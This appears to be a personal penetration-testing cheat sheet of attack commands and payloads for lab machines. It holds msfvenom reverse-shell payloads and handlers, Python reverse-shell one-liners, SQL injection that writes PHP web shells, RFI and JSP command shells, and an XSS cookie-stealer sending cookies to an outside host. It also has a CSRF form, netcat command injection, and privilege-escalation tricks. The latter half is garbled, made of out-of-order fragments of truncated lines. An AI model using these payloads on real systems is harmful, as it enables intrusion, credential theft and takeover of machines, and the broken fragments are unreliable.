msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=443 E

enum4linux --- for samba or smb shares


dig == zone transfer in case domain present and trusted ip present, add it to list and ip

sudo -l --- after normal user breaking


user can edit /etc/sudoers edit and you are root

echo os.system('/bin/bash')

sql injection test:


1' or '1'='1
or 1=1 -- -

get root if mysql running as root: (login to mysql ==> mysql -h localhost -u root -p , check for pass in config or using sqlm
)
https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
https://bernardodamele.blogspot.in/2009/01/command-execution-with-mysql-udf.html
mysql> select sys_exec('usermod -a -G admin john');

braking out of limited shell:


https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells

http://exploit-db.com/sploits/2009-linux-sendpage3.tar.gz -- get error use wget


simple root.c
int main()
{
setresuid(0, 0, 0);
setresgid(0, 0, 0);
system( "/bin/bash" );
return 0;
}

smbservice:
nmblookup -A ip
smbclient -L \\SHARE -I IPaddress -N

rsa-key predict:
cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPF
Firefox www.exploit-db.com -> Debian OpenSSL Predictable (5720) -> http://milw0rm.com/sploits/debian_ssh_rsa_20
tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048/
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPF
ssh -i 57c3115d77c56390332dc5c49978627a-5429 [email protected]

priv-escaltion walkthrough for services:


https://tehaurum.wordpress.com/2015/06/14/metasploitable-2-walkthrough-an-exploitation-guide/

showmount -e ipaddress
if result /* then
mkdir /metafs # this will be the mount point

mount -t nfs 192.168.127.154:/ /metafs -o nolock # mount the remote shared directory as nfs and disable file locking

------------------------------------sql injection attack_example:=============================


email=' union select null,null,null,load_file('/var/www/mysqli_connect.php'),null,null,null,null-- -&pass=pass&submit=
//mysql -->user passwd: root goodday

//write php shell onto disk


email=' union select null,null,null,"<?php system($_GET['cmd']);?>",null,null,null,null into outfile '/var/www/shell.php'

//confirm shell is written to webserver root


email=' union select null,null,null,load_file('/var/www/shell.php'),null,null,null,null-- -&pass=pass&submit=Login&sub

//shell can be accessed at http://10.10.10.100/shell.php?cmd=[command]


http://10.10.10.100/shell.php?cmd=id
http://10.10.10.100/shell.php?cmd=uname -a
http://10.10.10.100/shell.php?cmd=which python

//python reverse shell one liner


python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.50

//privilege escalation
/var/mysqli_connect.php has root password
ssh using this password

mount_nfs_share:
to check mount -e ipaddress
mkdir /tmp/nfs
mount -t nfs 192.168.1.72:/home/vulnix /tmp/nfs -nolock

sudo /usr/bin/nmap --interactive


nmap> !/bin/bash

python -m SimpleHTTPServer 991

# simple RFI
page=data://text/plain, <?php system("whoami");?>

# base64 encoded RFI


page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ3aG9hbWkiKTs/Pg==

# mini shell
page=data://text/plain,<?php system($_GET[cmd]);?>&cmd=id

# base64 + URL encoded mini shell (didn't work without URL encoding)
page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOz8%2B&cmd=id

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((“192.168.22


--------------------get-cookie-------------------
<script>
var request = new XMLHttpRequest();
var url = 'http://192.168.222.128/' + document.cookie;
req.open ("GET", url);
req.send();
</script>

-----------------scrf-for-admin-messages---------------
<html>
<body>
<form name="changepass" method="post" action="http://127.0.0.1:8081/change-password">
<input type="hidden" name="username" value="spiderman">
<input type="hidden" name="password" value="abc123">
</form>
<script type="text/javascript">
document.changepass.submit();
</script>
</body>
</html>

shell-shock-privelege-escalation
sudo PS1="() { :;} ; /bin/sh" /home/bynarr/lime

gobuster -u http://192.168.252.140/ -w /usr/share/wordlists/wfuzz/general/common.txt

devnull' or '1

ATTACH DATABASE '/home/devnull/public_html/img/demo.php' as pwn;


CREATE TABLE pwn.shell (code TEXT); INSERT INTO pwn.shell (code) VALUES ("<pre><?php echo shell_exec($_GET['c

Priv-escalation-linux (chown, tar,chmod, rsync )


https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt

web_delivery_exploit_windows:
https://www.rapid7.com/db/modules/exploit/multi/script/web_delivery
Microsoft Windows - Unauthenticated SMB Remote Code Execution (MS17-010)
https://vulners.com/exploitdb/EDB-ID:41891?utm_source=telegram&utm_medium=vulnersBot&utm_campaign=subsc

custom script to pull ans upload .phpshell

; echo '<?php error_reporting(E_ALL); ini_set(display_errors", 1); $fp = fopen($_POST["name"], "wb"); fwrite($fp, base6

python-upload script
import requests,base64
s = requests.session()
target = "http://10.200.0.104:33447/Challenge/test.php"

f = open('b374k.php')
payload = {
name: "test2.php",
content: base64.b64encode("\n".join(f.readlines()))
}
r = s.post(target, data=payload)

mysql -u root -p -h 192.168.56.102

Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.ph

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.8 LPORT=4444 -f raw -o meterpreter.php

nmap -sU -n -r -T4 192.168.231.128

--------------bypass file upload and browse ristrictions .php-------------


php://filter/convert.base64-encode/resource=
create a file with GIF extension and add GIF98 in the first line

For x in 1466 67 1468 1514 1981 1986; do nmap –Pn –host_timeout 201 –max-retries 0 –p $x 192.168.0.103; done.

lsb_release –a

find / -user root -perm -4000 -ls 2>/dev/null


msfvenom -p php/meterpreter_reverse_tcp LHOST=10.11.0.50 LPORT=1234 -f raw > shell.php

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.50 LPORT=1234 -f asp > shell.asp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.50 LPORT=1234 -f raw > shell.jsp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.50 LPORT=1234 -f war > shell.war

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.11.0.50
set LPORT 1234
set ExitOnSession false
exploit -j -z

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.11.0.50 LPORT=3333 -b "\x00" -e x86/

<% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<br />"); Pro

https://packetstormsecurity.com/files/139241/vbscan-0.1.7.tar.gz

Linux Kernel Multiple Prior to 2.6.24.1 Multiple Memory Access Vulnerabilities


http://www.securityfocus.com/bid/27704/exploit

Linux Kernel CVE-2012-0056 Local Privilege Escalation Vulnerability


http://www.securityfocus.com/bid/51625/discuss

Linux kernel ptrace/kmod local root exploit/all current 2.2.x and 2.4.x kernels
https://www.win.tue.nl/~aeb/linux/hh/ptrace-kmod-exploit.c

Windows priv Escalation


https://github.com/PowerShellMafia/PowerSploit

Sample for cmd-injection:


http://www.example.com/basilic/Config/diff.php?file=|cat /etc/passwd&new=1&old=2
to run reverse shell:
http://www.example.com/basilic/Config/diff.php?file=|nc -v 127.0.0.1 3333 -e /bin/bash&new=1&old=2

Windows priv escalation:


google Cesar Cerrudo

Reverse-shell(if things do not work)


http://pentestmonkey.net/tools/web-shells/php-findsock-shell

https://www.exploit-db.com/exploits/1198/

nmap -Pn -n -sT -sV -O -vv 10.11.1.49 -p0-65535

http://fuzzysecurity.com/tutorials/16.html

priv esc= half nelson, full nelson, vmsplice and sock sendpage

Commands to run on Windows


systeminfo
type boot.ini
hostname
ipconfig /all
netstat -ano
net users
net localgroups
route print
arp -A
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
schtasks /query /fo LIST /v
net start
accesschk.exe -uwcqv "Authenticated Users" *
dir network-secret.txt /s
windump -i 2 -w capture -n -U -s 0 src not 10.11.0.X and dst not 10.11.0.X
Commands to run on Linux
uname -a
id
cat /proc/version
cat /etc/issue
ifconfig -a
netstat -ano
cat /etc/passwd
cat /etc/group
cat /etc/shadow
cat /etc/hosts
arp -a
iptables -L
crontab -l
find . -name "network-secret.txt"
tcpdump -i eth0 -w capture -n -U -s 0 src not 10.11.0.X and dst not 10.11.0.X
tcpdump -vv -i eth0 src not 10.11.0.Xand dst not 10.11.0.X

https://addons.mozilla.org/de/firefox/addon/wappalyzer/

http://tools.kali.org/information-gathering/dotdotpwn

https://bitvijays.github.io/blog/2015/04/09/learning-from-the-field-intelligence-gathering/
http://www.howtogeek.com/104337/hacker-geek-os-fingerprinting-with-ttl-and-tcp-window-sizes/

osce::
http://www.cs.fsu.edu/~redwood/OffensiveComputerSecurity/lectures.html

Web Payloads
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.11.0.50 LPORT=1234 -f raw > shell.php

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.50 LPORT=1234 -f asp > shell.asp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.50 LPORT=1234 -f raw > shell.jsp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.50 LPORT=1234 -f war > shell.war

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.11.0.50
set LPORT 1234
set ExitOnSession false
exploit -j -z

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.11.0.50 LPORT=3333 -b "\x00" -e x86/

<% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<br />"); Pro

-------------------------------------------------------------------------------------------------------------------------------------------------------
8 -e /bin/bash
a reverse shell

etter=List+of+content+items..." -p letter --banner --current-db --current-user --is-dba


etter=List+of+content+items..." -v 0 --passwords
etter=List+of+content+items..." -v 0 --dbs
etter=List+of+content+items..." -v 0 --tables -D joomla
etter=List+of+content+items..." -v 0 --dump -D joomla -T jos_users
etter=List+of+content+items..." -v 0 --file-read=/etc/passwd

etter=List+of+content+items..." -v 0 --file-read=/etc/apache2/apache2.conf

etter=List+of+content+items..." -v 0 --file-read=/etc/apache2/sites-enabled/000-default
che2_sites-enabled_000-default
etter=List+of+content+items..." -v 0 --file-read=/var/www/configuration.php # Joomla default
| grep -i pass -A 1 -B 1

password=123&Submit=Login" -v 0 --os-shell

password=123&Submit=Login" ' union select '<?php system($_GET["cmd"]); ?>', '' into outfile '/var/www/bd.php'#
greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursiver

or pass in config or using sqlmapy

-udf-for-windows-and-linux/
xpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0Q
m/sploits/debian_ssh_rsa_2048_x86.tar.bz2

xpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0Q

ation-guide/

nfs and disable file locking

null-- -&pass=pass&submit=Login&submitted=TRUE

outfile '/var/www/shell.php'-- -&pass=pass&submit=Login&submitted=TRUE


ss=pass&submit=Login&submitted=TRUE

EAM);s.connect(("10.10.10.50",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh",

EAM);s.connect((“192.168.222.128”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/b


php echo shell_exec($_GET['c']); ?>");
ersBot&utm_campaign=subscription

me"], "wb"); fwrite($fp, base64_decode($_POST["content"])); fclose($fp);' > ../test.php

wp-content/uploads/shell.php";

$x 192.168.0.103; done.
PORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe

meter("cmd") + "<br />"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStr


&new=1&old=2
PORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe

meter("cmd") + "<br />"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStr

--------------------------------------
ww/bd.php'#
multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space
mVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0a

mVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0a
=subprocess.call(["/bin/sh","-i"]);'

o(),2);p=subprocess.call([“/bin/sh”,”-i”])
utStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String d
utStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String d
2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,vers
EGvw2zW1krU3Zo9Bzp0e0ac2U qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE kcP Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc W

EGvw2zW1krU3Zo9Bzp0e0ac2U qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE kcP Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc W


DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %>
DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %>
otes,versionedkeywords,versionedmorekeywords,xforwardedfor
5oGUkxdFo9f1nu2OwkjOc Wv8Vw7bwkf 1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable

5oGUkxdFo9f1nu2OwkjOc Wv8Vw7bwkf 1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub


dLine(); } } %>
dLine(); } } %>

You might also like